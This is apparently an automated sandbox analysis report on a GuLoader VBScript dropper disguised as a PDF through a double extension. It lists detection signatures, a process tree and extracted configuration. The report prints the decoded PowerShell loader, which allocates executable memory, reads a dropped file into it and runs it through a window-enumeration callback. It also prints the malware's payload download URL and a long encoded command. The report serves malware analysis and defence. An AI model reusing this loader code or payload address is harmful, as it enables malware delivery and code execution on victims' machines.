Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
doc_65398086_4190362045539.pdf.vbs

Overview

General Information

Sample Name:doc_65398086_4190362045539.pdf.vbs
Analysis ID:625179
MD5:2fc6f3477035823ff7864187b5b2a5cc
SHA1:8e6db7c18a5725e795d7421baf84cae637fbcc53
SHA256:74e1b9fa91b0840706b7418b8604d76efab886fec1704b8810ad389aa6a9cb9b
Tags:GuLoadervbs
Infos:

Detection

GuLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

  • System is w10x64
  • wscript.exe (PID: 7096 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\doc_65398086_4190362045539.pdf.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 5504 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# I n s t r u 9   S B E U R T E R N E   S l a n   S p o n t a n 7   U N C A L L   e m b o   r e i t   T a r p a p e   u g i f t e s d   B A C K S T A I R   e g o i t y h   S m e d   U R O G E N   v a s o r r h a p   A m e t r o   P A R A P H R A S T   K r y m m e l l o c 2   I N T E R S P I R   U n s q u e 6   j a c o b i t i s   P H O N O P H   A b s c o n d e r s 7   C h i k i t a o p s   S K Y G G   D O M M E D A G S   n o n a s s i s t a   A r c h c h e   t v i v   K a p r i f o l i   F i n a n s t i    
 # T r i p p e t s   M l k e 2   n o n e x p l o r   F O L K E C E   A r v e f l g e   F A S T P R I S S Y   H o g g w 6   R e p e t 4   H A L V O N K L E   A r b e j d s   P L O T T E R   T s e d    
 # D y n a m i k k e n 7   S T K Y S T T   H y d r o n i t 5   r e d i s t r i   m e r i c a r   v i p p   F a b r 1   F L O V M A   A A N D S H O   S t a a l s t u   J E S U I   T a n a   C o m m o   G u a p i n o   S y n k r o n 7   d e v l i n r e t   O m s t n i n g s g   R e s e 2   m e t r o l o   S U G E N E K D B O   S v i r p e t s u m 1   h y d r a t e r   O B S E R V A   T E M P A N A   V I K I N G E R   u p r i v e e k s   h e a r t b   E m b e d   U N A S S E N   O P K L A   e e b r e e r e   P i c r i t i c 3    
 # E E L I E S T   C r y s t a l o g 1   D U S I N M E   I n d i v 8   u d s k r i f t s p   T e k n o k r a 1   t y n d t f   E l e v t i m e 6   d y k s v   b o n b o n e r s   a n t i c a p i t   u n d e r   v i e r   Y D E R P   K l b e b a a n d 9   V i p s t 4   M a x i m o n   A p p r a i s e 4   A R T I G E R    
 # U D S K R I D N   z i t a s   s p a n k   T i p p e r h o 6   s c r o l   F n i s r   F R A S I G E   d i e t i c i a   h a a n   S p a a m n d s 1   s e r v i   L e d s a g e m u   U n d e r k e n d t 7   S a n d p 4   k a p s l e r b a s   d i s r   P R O P   r o s s e   F o r k l a 9    
 # T r a n s i s t o r 1   W A R D   D o m s f o 3   B A J A D S E N   K A R A K T E R B   c h l o   I s o c   O r o n t i u m 3   E q u i p p e 7   E p i g r a m r   M a t t i s p u   S h o p p i n g e   R E T I   D E O R S U M V   a l m u   G r a v h u   F o r s g 8   T H I R   L I T O G R A F R A   S t r a   d i s t r i   S P L I C E A B   g r i t m e d i   l s e a d g a   K A T A P U   m a n i   P a r e n t h o o   u d s v i    
 # S a m l i v s 5   a m b i   u r o o t w o s   R e s i s t i n g l 7   t r a n s p o r t a   s p e j l i n g   N A T I O N A L   E n d e v e n 6   R O L L E   U n i n t e l l 6   m o d e   S e c t i o n a l l 7   U n s e r 9   F e r r y s l o    
 # T A N D B R   f r i o   T i l l i d 7   P r o g y p 9   H A V E B R   m a u g e r a s s   b e m a l i n g c o   H e t e r o m o r p 2   S n a p r e   A B N E   L y s d d   U n d e r    
 # M U L L E I N S   M a g d a l 4   N O N C R Y S T   H o e j r 5   B U N I N G E   S W I D G   f o r p a g t   T Y P E G O D   S M A A P A R T I   U N D E R S K O V D   S k o l e g   a r u s h a   c o a t   B e k y m r e 5   s n i g g e r e r a   N A B O   V A T T E T S   P a r a t 6   R A B A T   M i s d e s c r i b   P E N S I   T a m r a 8   P R V E L S    
 # T o b a n t i h 5   p o t o r o o s i k   D o r s o i n t   a n f a   Q u a d r i r e   k i l o v a r e   B L A N K L A K S   H A F F   T r a e k v o g n e   S I G N   R e s c i   p a n t e n d e s a   R a d i a l g a d 3   e m b r o i d e r   T o l r e r 1   L e v i g a   S k r u 5   A f l a d e e n   U n g l a 9   A e r o s o l e 3    
 # A f r i k a n d e   M e d l 4   o b s t   a n s t d e   a c c e l e r a t i   s i l i c   I n d e k l 3   K n e b l i n g e   N o t o d o n   P a c u n o n s   B a r i u m m   U n d e 6   p o l a   b o o b o o s h a   D e x t r o r o t   T a w i e o p e r a   C r e s s y r u t s   T e x t u i s t b 6   M a z h   M i c r   d i f f e r e n c   N O N S C H I S   I n o h e s 6   H I L D I M I T A   M e t a i n   a n t i c y    
 # E p i l d o d e c   U p b l o w p h y l   p r e t r e a t   r e a c c   Y e l l o w   s u b s t r a   S T A B I   F R O S T   T r e s t l e f r a    
 # p r e e x t i   S R I N T E   S k a m f i l 3   H a l k a h s m i d   A l e b e n   t e l e f o n   S a a t e r p a l   T W E N   D r t r s 6   R E M O   A M P H I C    
 # B r o v 4   B a g p e r r o n   S H A D O W L I K E   M o e u r s f l   U s a n d h e 5   S t i f t s f r   S e p i o n o p f 2   S t e n g a l l e n 5   T v i v 9   v i a l m a k e   A r b e   R e p i l 9   A u t h v   B l e a 8   F o t o 6   b a n k d i r e   O e d e 1   p u y a l   D e p r e s 3   C A N N    
 # U n d e r   V i s k e i 8   S e x i v a l e n c   P u n d i   k r a v m e   D e c a l c   G o l d c u p   I m p e 1   U D P E G E S O P S   t i n s y k o   e s s e n t i a   S t o r h 3   V i r k s o m   O K A P I S S T R I   M o n e t i t e 7   S Y R I N G E N S   K o n f u s i o n e 9   T o m e r w h e e l 3   H A V E N E R S H   B r a i    
 # K O N F I T U R E   F o o t h o l d   B I L B O Q U E T   S h i f t a b l e 9   O u t s   v e n s t r e l i   F L A D S Y N   G E N E R A L S   S N O G E S   M I T U O P S T   S I D T   T r o l d d   C a r d i   m e n s   r n n e b o   X X X V I   a d d s t o l   p a r b   S a l m   H Y L A G Y   T i l s n i g e 9   D o u c e p e 1   R a r e f i 3   P o s s   N o n a r y o p t   P h o t o r a d i   M e d a 2   e q u i n o x   A M B U L A T I   A L G E B R A   I n t r a n s    
 # W O O D R   M i n i   F o r h i n   V l g e r n e c o   R A T A   v u l p i   O m v u r d e r i   O B S E R V A T I   T u b b e r o   T y p e 2   H O R N P I P E I C   g r u n d   f r y s   n o n l a r c e n o   t i t o   S c e n a r i e t e   P a r a p r 3   A d s c 7   S T R A F U D   N e d r a k k   M A I L A B I L I   S m a a l i g h   S K E H E J R E   A f g a n g s   B E A R D E   B E N G   f e d e r a c   k l d e b r s t   v o v s    
 # b a r o m   L u f t f a r t 3   t e l e s   C H A L O   U n i f i e s s a   S k r a a p a   U n a d   n a s a l i   l a u g e   F o r v a s k 4   B a t a t e r n e o 7    
 # P A U C I   f o r h o e   D i s r o   D e b o u c h m e 9   T e l e 2   C o l l u d e b o a 4   C E L I O S C H   T i l k e n d t   A p h o r   C o m b i n d d o p   D I S P E R S I O N   K o n t i n u a t i 2   U n c l e r k l i 2   F U L D T I D   T o x o t 6   R a n k n e s s   M o n o t y p 6   N e u r o 4   n e u r o p h i l   h e l s t e n s   S T R A P N I N   H u d e 3   O E V R E    
 # t o m c   K O N F O R M   C i t r o n p r e s   P o s i t i v e l y   H E M O M   S k g p 9   s p r o g u   A n t i m   S N O O P E R   I s o t e r e i 7   C U R L I E W U R L   f a g s    
 # A F T E   D r e j e   B i f a n g s t m a   I r r e c o g n 4   C B C M S M U D   s s o n s v i n   R a n d 2   V e d e r h f t i 3   n o n a n a l o   c e r u l e i t   D g n c e n   a r t h e   F i n a n s   F r u e f r a k   P A L M E B   S a a m a s k   O p t a n t e   L o c h i o s   S e j r s f a n e 7   F r o n t i n g l 7   P O K A L   D I N B   d i s s   v a t f   T a r z a n u 7   e l e c t r o g a   V I Z A R D   i n t e   A n v e n   C a t e c h i 7    
 # D R O S S E L K   F A R V E H A N D L   T E K S T B E H A   S p e d i t 7   G e s t u r a p 8   B r e e c h e d b o 7   d i s s e n t   H I N G E   K O N D I C Y K L E   t a n k   f a g o t t e   V u l t u r o u s   K o h l a n 3   T r i u m   B O S S A G E   k a t a s t r o   M o z a m b 5   t u n i n g s s t   A c f t m   B a k k e n b a r 6   a f s t   A f s t n i n g   B r o b u e 6   S a p p h    
 # S C L E   G R A N I T T E R N   M a n a n e 6   E m p r i s e p a 6   u r u g u a   S m a a 8   N o n p a p i s 4   K L A S S I   s v a g h    
 # O V E R N I   s t e r   T E I I D A E   U N G T J E N   C o n t r a c t i v   u n e q u i t a   G a s p a   Z O O M E C H A   O V E R P O P U L O   C E R T   L i q f r a p 2   I M P R O V   j a c t u r a s k   S l o w c o a c   B L A D S Y S   u n c l a s p   K A G E K   S E M M E S S K O R   V O L C A N I Z   a n t i s   K o n t o r 6   B U T I K S C E N   S h o u l d 4   M i l j a d m i 2   U r e d i n o 1   g a l l o n s t    
 # A F K A   S T Y R I N G S M I   U n i v e r s 5   M a i n v i c k i 6   B L O K H   G E J L E R O S S   b i s s e   U d h u l   K l u n k v i p 2   S t r u t h b r 1   v e r s   O R I G I N A L F R   M a n i 3   O u t r i b b 6    
 # m e j e t c h a   S i k k   k e r n e l l i n   B i b l i o g r   G a d e h   s m o k   B a r f o d e d e s 8   r e t u r n e r i n   S c a p e l e s s   s q u a l   K o n f o 1   G L U T I   R i g e t s f a r 5   O B S E R V A   A l i m e n t a t    
 # G e n n   P a n d   G O L D E N W I N G   R e d n i n g s h o   U D F R I E L   B e a r a b i l i   M e d l   T e m p o e r s f i   S p i r i t u s 5   s t r a n   F L O P P Y D   u n a a d i g t   M A S K E P R   B e s v e g o   L j t n   H y s t r   p a t e n t r e t   T i d s f 3   t o r i d   l i l a p l e a c h   S c h o o d 6   T o i l e 9   O p s u m m e r e 8   S c i r 3   H y d r o r h i z a   U N D S I G   G U N J B R A   I r e t t e s t t e 7    
 # U N A P P R   M I N E   P a i n   F O R U   P R E S E R V   b a g s t r b   U n n a r c   u n i m p u g n e   L a n d e j e n d o   T r o l d e r 8   O p b y   E N T R E D R   L n g o d t g r e   M A R R Y   v g t f   C l o t u r i n 7   s l y n g e l s t r    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   R O T A T I O N F O 1  
 {  
 [ D l l I m p o r t ( " g d i 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m F o n t s A ( s t r i n g   f e r s k v a , u i n t   p a r a p l e g , i n t   D E P O , i n t   R O T A T I O N F O 0 , i n t   H o v e , i n t   a f t e r r a k , i n t   S v i n g h j u l e 1 ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " C r e a t e F i l e A " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   V i a c ( [ M a r s h a l A s ( U n m a n a g e d T y p e . L P S t r ) ] s t r i n g   f e r s k v a , u i n t   p a r a p l e g , i n t   D E P O , i n t   R O T A T I O N F O 0 , i n t   H o v e , i n t   a f t e r r a k , i n t   S v i n g h j u l e 1 ) ;  
 [ D l l I m p o r t ( " n t d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   N t A l l o c a t e V i r t u a l M e m o r y ( i n t   R O T A T I O N F O 6 , r e f   I n t 3 2   T E R R A , i n t   M a n i o k p , r e f   I n t 3 2   R O T A T I O N F O , i n t   P h o n o l o , i n t   R O T A T I O N F O 7 ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " R e a d F i l e " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   C D A C ( i n t   M a n i o k p 0 , u i n t   M a n i o k p 1 , I n t P t r   M a n i o k p 2 , r e f   I n t 3 2   M a n i o k p 3 , i n t   M a n i o k p 4 ) ;  
 [ D l l I m p o r t ( " U S E R 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m W i n d o w s ( I n t P t r   M a n i o k p 5 , i n t   M a n i o k p 6 ) ;  
  
 }  
 " @  
 # R u b i n e m a g t 5   M y k i s s   S t e n o 3   U D D A N N E L S E   E X A C T N E   L a u r   M o o n i 1   A D J O   B e m u r 1   I N S T   A d j u s t   F r e r p r v e 9   H j e r t e b a r   F l u t   H e d e n s k r a m   B u r m a n n i a   m u h a m   B e g y   H u a h u k u l i s 8   B a g b u 2   W A R S   M a s k e d b t t   d r y p s   s t o p p e g   S w e e 5   S O D F   b a r r   M a n g e r s f l a 9    
 $ R O T A T I O N F O 2 = " $ e n v : t e m p "   +   " \ r e t t e t a s t . d a t "  
 # n o n h e r e d   i n k a s s o   F u l d b   S e l v a n g   G n i d d e 2   S U R M O   B O D H I S A T T   Q U I S   e n s r e t t e n d   c r y p t o d i r e   H o m e r o o m p   S P A R E N D E S P   A n t i l i t   E B U L L   F o r b   V i l d f a 2   M i n a e a 1   s y g d o m f o r n   A l m i n d e l   D R U E S    
 $ R O T A T I O N F O 3 = 0 ;  
 $ R O T A T I O N F O 9 = 1 0 4 8 5 7 6 ;  
 $ R O T A T I O N F O 8 = [ R O T A T I O N F O 1 ] : : N t A l l o c a t e V i r t u a l M e m o r y ( - 1 , [ r e f ] $ R O T A T I O N F O 3 , 0 , [ r e f ] $ R O T A T I O N F O 9 , 1 2 2 8 8 , 6 4 )  
 # R e s u 5   S k l d t e 3   M A G N E T I S M   K a l k u 8   A e s c   D O R E S T A   G o a l p o   n a t b o r   S y n e r g e t i c 4   G y n a n d r a 1   K l a v i   W A N L A   G e l a   m i l j b e r   T o l s e y l   e p i p l   W O R S H   C o l e m   A n n u 1   L E V I G A T I N   s t a b s o f f i   i r o n   u b l u f r d i g    
 $ R O T A T I O N F O 4 = [ R O T A T I O N F O 1 ] : : V i a c ( $ R O T A T I O N F O 2 , 2 1 4 7 4 8 3 6 4 8 , 1 , 0 , 3 , 1 2 8 , 0 )  
 # P U M P E R N I   B R E P   R E N N E S I   B a b b o   S t y l t   N a z i s m e s c a 3   l a t e n e d r a   A L G E B R A I S   K e t t q u i   P n e u m a   A f g i f t   t e m p l o   S K I N D K A A B   F e r n i s e r e 1   r e c t i f i e   R A D I O A   g l o s s o   b e t a l i n g s e   F r i t u r e 2   s u b e t h a t   m e m o   U d a r b e j d e 3    
 $ R O T A T I O N F O 5 = 0 ;  
 # S v e l n i   T E R R E S T R I A   G r u m m e   R Y D H A N D G   S e c o n d e 2   r e q u i   M E R S T I G N   E m b r y o n a   K o r s v e j t r 3   i s d k k e d   S u b b a s 4   v e l l a b a g b   n o n f e r   V i r t u o s   K R O P S S   K A L F   A m t s r a a d s f 6    
 [ R O T A T I O N F O 1 ] : : C D A C ( $ R O T A T I O N F O 4 , $ R O T A T I O N F O 3 , 5 7 9 3 3 , [ r e f ] $ R O T A T I O N F O 5 , 0 )  
 # D Z O T O M M E S K   U d s k r i n g   S e m i a m 6   P u r l g   s y t t e n a   H y d r   E u r a s i e r e n   M u l t 3   U n s w i n   A d v o k 8   M a r i n e s t a   T e n d   P e l v e s r u a t 4   i n d d a t a f i l   A k a d e m i s 1   G A R U D A   E v e n t u 1   P R E S E N T I M   D i v u l 7   S p i l d e v a   S t y r k e   F o t o t e l   A u t o t 5   E A R T   H y d r a g o g y   B r i n c e u 9   T r i p l u   u n o r a l e s   S k e l e    
 [ R O T A T I O N F O 1 ] : : E n u m W i n d o w s ( $ R O T A T I O N F O 3 ,   0 )  
  
  MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4164 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 5012 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBAD5.tmp" "c:\Users\user\AppData\Local\Temp\wwh3pdnv\CSC196797DCDE8F47A0A151AAD0920D1B.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
{"Payload URL": "https://vegproworld.com/wp-content/Medalj.vbs"}
SourceRuleDescriptionAuthorStrings
0000000E.00000002.894432907.0000000008F80000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 0000000E.00000002.894432907.0000000008F80000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://vegproworld.com/wp-content/Medalj.vbs"}
    Source: doc_65398086_4190362045539.pdf.vbsVirustotal: Detection: 18%Perma Link
    Source: doc_65398086_4190362045539.pdf.vbsReversingLabs: Detection: 19%
    Source: Binary string: k;C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.pdb source: powershell.exe, 0000000E.00000002.887326067.0000000004919000.00000004.00000800.00020000.00000000.sdmp

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://vegproworld.com/wp-content/Medalj.vbs
    Source: Initial file: fagb1.SaveToFile FileName, adSaveCreateOverWrite
    Source: powershell.exe, 0000000E.00000002.885692627.0000000004571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000000E.00000002.887074953.0000000004809000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBJAG4AcwB0AHIAdQA5ACAAUwBCAEUAVQBSAFQARQBSAE4ARQAgAFMAbABhAG4AIABTAHAAbwBuAHQAYQBuADcAIABVAE4AQwBBAEwATAAgAGUAbQBiAG8AIAByAGUAaQB0ACAAVABhAHIAcABhAHAAZQAgAHUAZwBpAGYAdABlAHMAZAAgAEIAQQBDAEsAUwBUAEEASQBSACAAZQBnAG8AaQB0AHkAaAAgAFMAbQBlAGQAIABVAFIATwBHAEUATgAgAHYAYQBzAG8AcgByAGgAYQBwACAAQQBtAGUAdAByAG8AIABQAEEAUgBBAFAASABSAEEAUwBUACAASwByAHkAbQBtAGUAbABsAG8AYwAyACAASQBOAFQARQBSAFMAUABJAFIAIABVAG4AcwBxAHUAZQA2ACAAagBhAGMAbwBiAGkAdABpAHMAIABQAEgATwBOAE8AUABIACAAQQBiAHMAYwBvAG4AZABlAHIAcwA3ACAAQwBoAGkAawBpAHQAYQBvAHAAcwAgAFMASwBZAEcARwAgAEQATwBNAE0ARQBEAEEARwBTACAAbgBvAG4AYQBzAHMAaQBzAHQAYQAgAEEAcgBjAGgAYwBoAGUAIAB0AHYAaQB2ACAASwBhAHAAcgBpAGYAbwBsAGkAIABGAGkAbgBhAG4AcwB0AGkAIAANAAoAIwBUAHIAaQBwAHAAZQB0AHMAIABNAGwAawBlADIAIABuAG8AbgBlAHgAcABsAG8AcgAgAEYATwBMAEsARQBDAEUAIABBAHIAdgBlAGYAbABnAGUAIABGAEEAUwBUAFAAUgBJAFMAUwBZACAASABvAGcAZwB3ADYAIABSAGUAcABlAHQANAAgAEgAQQBMAFYATwBOAEsATABFACAAQQByAGIAZQBqAGQAcwAgAFAATABPAFQAVABFAFIAIABUAHMAZQBkACAADQAKACMARAB5AG4AYQBtAGkAawBrAGUAbgA3ACAAUwBUAEsAWQBTAFQAVAAgAEgAeQBkAHIAbwBuAGkAdAA1ACAAcgBlAGQAaQBzAHQAcgBpACAAbQBlAHIAaQBjAGEAcgAgAHYAaQBwAHAAIABGAGEAYgByADEAIABGAEwATwBWAE0AQQAgAEEAQQBOAEQAUwBIAE8AIABTAHQAYQBhAGwAcwB0AHUAIABKAEUAUwBVAEkAIABUAGEAbgBhACAAQwBvAG0AbQBvACAARwB1AGEAcABpAG4AbwAgAFMAeQBuAGsAcgBvAG4ANwAgAGQAZQB2AGwAaQBuAHIAZQB0ACAATwBtAHMAdABuAGkAbgBnAHMAZwAgAFIAZQBzAGUAMgAgAG0AZQB0AHIAbwBsAG8AIABTAFUARwBFAE4ARQBLAEQAQgBPACAAUwB2AGkAcgBwAGUAdABzAHUAbQAxACAAaAB5AGQAcgBhAHQAZQByACAATwBCAFMARQBSAFYAQQAgAFQARQBNAFAAQQBOAEEAIABWAEkASwBJAE4ARwBFAFIAIAB1AHAAcgBpAHYAZQBlAGsAcwAgAGgAZQBhAHIAdABiACAARQBtAGIAZQBkACAAVQBOAEEAUwBTAEUATgAgAE8AUABLAEwAQQAgAGUAZQBiAHIAZQBlAHIAZQAgAFAAaQBjAHIAaQB0AGkAYwAzACAADQAKACMARQBFAEwASQBFAFMAVAAgAEMAcgB5AHMAdABhAGwAbwBnADEAIABEAFUAUwBJAE4ATQBFACAASQBuAGQAaQB2ADgAIAB1AGQAcwBrAHIAaQBmAHQAcwBwACAAVABlAGsAbgBvAGsAcgBhADEAIAB0AHkAbgBkAHQAZgAgAEUAbABlAHYAdABpAG0AZQA2ACAAZAB5AGsAcwB2ACAAYgBvAG4AYgBvAG4AZQByAHMAIABhAG4AdABpAGMAYQBwAGkAdAAgAHUAbgBkAGUAcgAgAHYAaQBlAHIAIABZAEQARQBSAFAAIABLAGwAYgBlAGIAYQBhAG4AZAA5ACAAVgBpAHAAcwB0ADQAIABNAGEAeABpAG0AbwBuACAAQQBwAHAAcgBhAGkAcwBlADQAIABBAFIAVABJAEcARQBSACAADQAKACMAVQBEAFMASwBSAEkARABOACAAegBpAHQAYQBzACAAcwBwAGEAbgBrACAAVABpAHAAcABlAHIAaABvADYAIABzAGMAcgBvAGwAIABGAG4AaQBzAHIAIABGAFIAQQBTAEkARwBFACAAZABpAGUAdABpAGMAaQBhACAAaABhAGEAbgAgAFMAcABhAGEAbQBuAGQAcwAxACAAcwBlAHIAdgBpACAATABlAGQAcwBhAGcAZQBtAHUAIABVAG4AZABlAHIAawBlAG4AZAB0ADcAIABTAGEAbgBkAHAANAAgAGsAYQBwAHMAbABlAHIAYgBhAHMAIABkAGkAcwByACAAUABSAE8AUAAgAHIAbwBzAHMAZQAgAEYAbwByAGsAbABhADkAIAANAAoAIwBUAHIAYQBuAHMAaQBzAHQAbwByADEAIABXAEEAUgBEACAARABvAG0AcwBmAG8AMwAgAEIAQQBKAEEARABTAEUATgAgAEsAQQBSAEEASwBUAEUAUgBCACAAYwBoAGwAbwAgAEkAcwBvAGMAIABPAHIAbwBuAHQAaQB1AG0AMwAgAEUAcQB1AGkAcABwAGUANwAgAEUAcABpAGcAcgBhAG0AcgAgAE0AYQB0AHQAaQBzAHAAdQAgAFMAaABvAHAAcABpAG4AZwBlACAAUgBFAFQASQAgAEQARQBPAFIAUwBVAE0AVgAgAGEAbABtAHUAIABHAHIAYQB2AGgAdQAgAEYAbwByAHMAZwA4ACAAVABIAEkAUg
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBJAG4AcwB0AHIAdQA5ACAAUwBCAEUAVQBSAFQARQBSAE4ARQAgAFMAbABhAG4AIABTAHAAbwBuAHQAYQBuADcAIABVAE4AQwBBAEwATAAgAGUAbQBiAG8AIAByAGUAaQB0ACAAVABhAHIAcABhAHAAZQAgAHUAZwBpAGYAdABlAHMAZAAgAEIAQQBDAEsAUwBUAEEASQBSACAAZQBnAG8AaQB0AHkAaAAgAFMAbQBlAGQAIABVAFIATwBHAEUATgAgAHYAYQBzAG8AcgByAGgAYQBwACAAQQBtAGUAdAByAG8AIABQAEEAUgBBAFAASABSAEEAUwBUACAASwByAHkAbQBtAGUAbABsAG8AYwAyACAASQBOAFQARQBSAFMAUABJAFIAIABVAG4AcwBxAHUAZQA2ACAAagBhAGMAbwBiAGkAdABpAHMAIABQAEgATwBOAE8AUABIACAAQQBiAHMAYwBvAG4AZABlAHIAcwA3ACAAQwBoAGkAawBpAHQAYQBvAHAAcwAgAFMASwBZAEcARwAgAEQATwBNAE0ARQBEAEEARwBTACAAbgBvAG4AYQBzAHMAaQBzAHQAYQAgAEEAcgBjAGgAYwBoAGUAIAB0AHYAaQB2ACAASwBhAHAAcgBpAGYAbwBsAGkAIABGAGkAbgBhAG4AcwB0AGkAIAANAAoAIwBUAHIAaQBwAHAAZQB0AHMAIABNAGwAawBlADIAIABuAG8AbgBlAHgAcABsAG8AcgAgAEYATwBMAEsARQBDAEUAIABBAHIAdgBlAGYAbABnAGUAIABGAEEAUwBUAFAAUgBJAFMAUwBZACAASABvAGcAZwB3ADYAIABSAGUAcABlAHQANAAgAEgAQQBMAFYATwBOAEsATABFACAAQQByAGIAZQBqAGQAcwAgAFAATABPAFQAVABFAFIAIABUAHMAZQBkACAADQAKACMARAB5AG4AYQBtAGkAawBrAGUAbgA3ACAAUwBUAEsAWQBTAFQAVAAgAEgAeQBkAHIAbwBuAGkAdAA1ACAAcgBlAGQAaQBzAHQAcgBpACAAbQBlAHIAaQBjAGEAcgAgAHYAaQBwAHAAIABGAGEAYgByADEAIABGAEwATwBWAE0AQQAgAEEAQQBOAEQAUwBIAE8AIABTAHQAYQBhAGwAcwB0AHUAIABKAEUAUwBVAEkAIABUAGEAbgBhACAAQwBvAG0AbQBvACAARwB1AGEAcABpAG4AbwAgAFMAeQBuAGsAcgBvAG4ANwAgAGQAZQB2AGwAaQBuAHIAZQB0ACAATwBtAHMAdABuAGkAbgBnAHMAZwAgAFIAZQBzAGUAMgAgAG0AZQB0AHIAbwBsAG8AIABTAFUARwBFAE4ARQBLAEQAQgBPACAAUwB2AGkAcgBwAGUAdABzAHUAbQAxACAAaAB5AGQAcgBhAHQAZQByACAATwBCAFMARQBSAFYAQQAgAFQARQBNAFAAQQBOAEEAIABWAEkASwBJAE4ARwBFAFIAIAB1AHAAcgBpAHYAZQBlAGsAcwAgAGgAZQBhAHIAdABiACAARQBtAGIAZQBkACAAVQBOAEEAUwBTAEUATgAgAE8AUABLAEwAQQAgAGUAZQBiAHIAZQBlAHIAZQAgAFAAaQBjAHIAaQB0AGkAYwAzACAADQAKACMARQBFAEwASQBFAFMAVAAgAEMAcgB5AHMAdABhAGwAbwBnADEAIABEAFUAUwBJAE4ATQBFACAASQBuAGQAaQB2ADgAIAB1AGQAcwBrAHIAaQBmAHQAcwBwACAAVABlAGsAbgBvAGsAcgBhADEAIAB0AHkAbgBkAHQAZgAgAEUAbABlAHYAdABpAG0AZQA2ACAAZAB5AGsAcwB2ACAAYgBvAG4AYgBvAG4AZQByAHMAIABhAG4AdABpAGMAYQBwAGkAdAAgAHUAbgBkAGUAcgAgAHYAaQBlAHIAIABZAEQARQBSAFAAIABLAGwAYgBlAGIAYQBhAG4AZAA5ACAAVgBpAHAAcwB0ADQAIABNAGEAeABpAG0AbwBuACAAQQBwAHAAcgBhAGkAcwBlADQAIABBAFIAVABJAEcARQBSACAADQAKACMAVQBEAFMASwBSAEkARABOACAAegBpAHQAYQBzACAAcwBwAGEAbgBrACAAVABpAHAAcABlAHIAaABvADYAIABzAGMAcgBvAGwAIABGAG4AaQBzAHIAIABGAFIAQQBTAEkARwBFACAAZABpAGUAdABpAGMAaQBhACAAaABhAGEAbgAgAFMAcABhAGEAbQBuAGQAcwAxACAAcwBlAHIAdgBpACAATABlAGQAcwBhAGcAZQBtAHUAIABVAG4AZABlAHIAawBlAG4AZAB0ADcAIABTAGEAbgBkAHAANAAgAGsAYQBwAHMAbABlAHIAYgBhAHMAIABkAGkAcwByACAAUABSAE8AUAAgAHIAbwBzAHMAZQAgAEYAbwByAGsAbABhADkAIAANAAoAIwBUAHIAYQBuAHMAaQBzAHQAbwByADEAIABXAEEAUgBEACAARABvAG0AcwBmAG8AMwAgAEIAQQBKAEEARABTAEUATgAgAEsAQQBSAEEASwBUAEUAUgBCACAAYwBoAGwAbwAgAEkAcwBvAGMAIABPAHIAbwBuAHQAaQB1AG0AMwAgAEUAcQB1AGkAcABwAGUANwAgAEUAcABpAGcAcgBhAG0AcgAgAE0AYQB0AH